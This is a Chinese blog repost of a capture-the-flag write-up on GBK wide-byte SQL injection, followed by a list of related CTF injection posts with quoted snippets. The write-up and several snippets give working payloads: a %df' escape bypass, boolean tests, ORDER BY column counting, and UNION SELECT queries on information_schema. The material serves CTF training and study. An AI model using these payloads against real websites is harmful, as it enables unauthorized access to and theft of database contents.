南邮CTF--SQL注入题

最新推荐文章于 2022-06-16 19:25:29 发布
最新推荐文章于 2022-06-16 19:25:29 发布
阅读量325 收藏 1
点赞数
文章标签: 区块链 数据库
原文链接:http://www.cnblogs.com/AxsCtion/p/10885837.html
版权

南邮CTF--SQL注入题

题目:GBK SQL injection

解析:

1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清题目,GBK,接下来利用宽字节进行注入

2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功

3.继续改参数,1=2时,没有任何信息,找到注入点

4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显示错误,确定为2列。

5.既然查询到列,使用联合查询,union select 1,2 %23,

6.获取当前数据库:union select 1,database() %23

7.获取当前数据库名: id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.TABLES where table_schema=0x7361652d6368696e616c6f766572 %23

group_concat(table_name) 分组以后,把想要显示的列通过gruop_concat()函数拼接在一起。

information_schema.TABLES 切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等。

8.获取表名(ctf-4)id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.COLUMNS where table_name=0x63746634 %23

 

转载于:https://www.cnblogs.com/AxsCtion/p/10885837.html

weixin_34219944
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
总结笔记-CTF-SQL注入
qq_39283174的博客
12-22 454
关于SQL注入的相关CTF笔记
南邮mysql_南邮 SQL注入1
weixin_33329305的博客
01-19 151
目:点开source:Secure Web Loginif($_POST[user] && $_POST[pass]) {//如果上传两个变量user pass 则继续执行if下面的代码mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);//链接sae的mysq...
南邮ctf mysql_南邮CTF--SQL注入
weixin_28692867的博客
02-01 178
南邮CTF--SQL注入目:GBK SQL injection解析:1.判断注入点:加入单引号发现被反斜杠转移掉了,换一个,看清目,GBK,接下来利用宽字节进行注入2.使用'%df' '进行注入,emm报错,于是加入老手段,and 1=1 %23,ok,没报错,说明成功3.继续改参数,1=2时,没有任何信息,找到注入点4.利用order by 查询列数,当查询2时,显示正常,那么查询3时,显...
ctfSQL注入
m0_51644837的博客
12-10 190
CTF-sql注入
am_03的博客
08-23 106
在phpstudy里 #为注释 密码随便输入的 还可以输入admin’#(可注释掉) 注意:有的不让输入特殊字符,因为可以绕过验证 在URL处输入网址,在此工具里打开网页,可以点击右上方的扫描网址或者扫描URL 点击后,弹出的信息右键,点击SQL INJECTION POC, 在上方点击,可以获取它的web环境,数据库,命令执行,文件读取,文件上传等等 在下方点击获取信息可得到更多信息,弹出Version,Server,OS,u...
CTF-SQL注入
weixin_44770698的博客
06-16 5159
CTF-SQL注入目整理
SQL注入类型CTF目总结
Lelouch_E的博客
11-25 1542
SQL注入类型CTFunion 注入buu Fakebookbuu Baby Sqli盲注buu Hack World报错注入buu hardsql其他buu BlackList union 注入 buu Fakebook 注册后扫描目录发现:/robots.txt 测试发现/view.php?no=1 参数存在SQL注入,但是union select被waf拦截了 尝试绕过 爆表名 /view.php?no=-1 union/**/select 1,group_concat(table_name),
CTF平台库writeup(一)--南邮CTF-WEB(部分)
热门推荐
渗透、攻防、CTF、编程
06-25 1万+
WEB 1.签到 目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
南邮CTF-WEB-write-up 教程详细解说
残阳泼茶香的博客
03-20 3458
单身一百年也没用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 密码重置 php 反序列化 sql injection 4 综合 system SQL注入2 综合2 注入实战1 密码重置2 ...
南邮CTF-部分目writeup
gfoooooo的博客
10-15 2390
    1.签到 目非常简单,在审查元素中就可以发现flag 目传送门:http://chinalover.sinaapp.com/web1/ 2.md5 collision 这道利用了php的弱比较和md5值碰撞 而源码要求a和QNKCDZO的md5值相同,但a和它不相等 QNKCDZO的md5值为:0e830400451993494058024219903391 ...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
南邮CTF-WEB(在更)
weixin_43345082的博客
07-07 417
签到 key在哪里? md5 collision php弱类型比较 0e开头的值全相同 签到2 提示输入口令,但是发现只能输入10位,修改长度 这不是WEB 保存图片,winhex打开 层层递进 这太狗了,这谁能想得到 AAencode 查看源代码可能有乱码,是编码问,改一下编码 火狐在这里改 其他浏览器啊帖链接 浏览器改编码 直接在控制台里运行 单身二十年 抓包发现中...
南邮CTF injection-3 宽字节注入
include_heqile的博客
03-22 3050
从昨天晚上开始做的,结果踩了一个坑,干到了凌晨1点,电脑都自动关机了,也没做出来,电脑关机之后,又用手机查了一下,知道了应该用表名的16进制形式来进行爆表,然后到今天上午才做完,还是上计组的时候用手机的火狐做的,手机做是真的难受宽字节注入就是用一个大于128的十六进制数来吃掉转义符\,gbk编码,字节作为一个字符的编码表名库名的十六进制形式: 字符形式的表名: ctf表示成十...
CTF中的SQL注入
weixin_43906500的博客
02-24 346
1 环境配置 见文章:https://blog.csdn.net/weixin_43906500/article/details/114025507 docker-compose.yml version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-sql-1:latest ports: - 80:80 命令执行 docker-compose up -d 2
CTF--SQL注入
woshisz0413的博客
11-27 377
SQL注入思路: 1.是否存在SQL注入测试方法:(1)使用单引号’ (2)sqlmap:sqlmap.py -u http://******* 2.判断过滤的字符 SQL注入方式: (1)单引号’ (2)or/and 1=1 (3)order by --猜测字段长度 (&amp;&amp;与||绕过过滤) 例:order by 1… SQL绕过过滤方式: (1)某一关键字被过滤:1...
CTF-Web26(涉及SQL注入--基础
→_→
09-28 1151
26.这个看起来有点简单! 分析: 这一道很明显是一道SQL注入,这里我们手工注入: 1、判断是否存在注入点 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=1 http://ctf5.shiyanbar.com/8/index.php?id=1 and1=2 回显不同,说明存在注入点 2、猜字段数 http://ctf5.shiyanbar.com/8/index.php?id=1 order by 2 ...
CTF--SQL注入
weixin_43882862的博客
08-13 449
靶场第1SQL注入 目 链接:http://59.63.200.79:8003/ 解思路 打开链接,发现是一个网站,里面有个点击新闻,尝试点开。。。。 点开以后,域名变为:http://59.63.200.79:8003/?id=1 怀疑是不是有数字型SQL注入呢? 构造payload试一试 使用hackbar构造payload and 1=1,发现回显成功。。 构造and 1=2,发现回显失败。。所以判定为数字型SQL注入。下面开始SQL联合注入。。。 第一步:判断字段数 构造paylo
SQL注入1(南邮CTF
LANVNAL的博客
02-02 4291
链接*————————————————————————- 提示看源码:<html> <head> Secure Web Login </head> <body> <?php if($_POST[user] && $_POST[pass]) { mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_M
CTF-SQL注入(Get)
su__xiaoyan的博客
12-22 809
SQL注入 当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 实验环境 攻击者:Kali Linux(192.168.100.146) 靶机:VMware workstations Pro——Debian 6(32-bit)(192.168.100.132) 注意:当前靶机中并没有flag值,需要通过靶机上面的SQL注入漏洞获取数据库中的内容,登陆网站后台,利用网站
CTFsql注入练习
最新发布
07-29
回答: CTFsql注入练习是一种用于训练和测试SQL注入技巧的目。在这些目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些目通常包含了不同的注入场景和技巧,例如基于时间的盲注、报错注入、布尔盲注、宽字节注入等等。参与者需要通过分析应用程序的行为和结构,构造合适的注入语句来实现攻击目标。在解决这些目的过程中,参与者可以提高对SQL注入漏洞的理解和掌握,并学习如何防范和修复这类漏洞。 #### 引用[.reference_title] - *1* *2* [CTF-SQL注入入门题型](https://blog.csdn.net/weixin_43080961/article/details/121939366)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [i 春秋 CTF训练营 web——SQL注入 1(字符型注入)(手动注入)](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121626527)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down28v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值